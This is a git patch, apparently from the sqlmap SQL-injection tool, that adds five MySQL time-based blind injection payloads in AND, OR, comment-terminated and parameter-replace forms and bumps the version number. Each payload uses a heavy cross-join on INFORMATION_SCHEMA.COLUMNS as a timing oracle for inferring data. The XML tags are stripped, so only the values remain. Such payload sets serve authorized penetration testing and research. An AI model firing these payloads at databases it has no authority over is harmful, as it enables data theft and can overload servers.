From 4cc6afe0fc4e5f02d9e8725022d487ae1684e80d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Nov 2021 23:27:22 +0100 Subject: [PATCH] Adding proper heavy query payload for MySQL --- data/xml/payloads/time_blind.xml | 102 +++++++++++++++++++++++++++++++ lib/core/settings.py | 2 +- 2 files changed, 103 insertions(+), 1 deletion(-) diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml index daaa94d1f..dfd9a2d26 100644 --- a/data/xml/payloads/time_blind.xml +++ b/data/xml/payloads/time_blind.xml @@ -188,6 +188,26 @@ + + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + + + + +
+ MySQL + > 5.0.12 +
+ + MySQL < 5.0.12 OR time-based blind (BENCHMARK) 5 @@ -208,6 +228,26 @@ + + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + + + + +
+ MySQL + > 5.0.12 +
+ + MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) 5 @@ -229,6 +269,27 @@ + + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + # + + + + +
+ MySQL + > 5.0.12 +
+ + MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) 5 @@ -250,6 +311,27 @@ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + # + + + + +
+ MySQL + > 5.0.12 +
+ + MySQL >= 5.0.12 RLIKE time-based blind 5 @@ -1519,6 +1601,26 @@ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + + + + +
+ MySQL + > 5.0.12 +
+ + MySQL time-based blind - Parameter replace (bool) 5 diff --git a/lib/core/settings.py b/lib/core/settings.py index 809cb5d53..1dda2ac89 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from thirdparty import six from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.5.11.6" +VERSION = "1.5.11.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)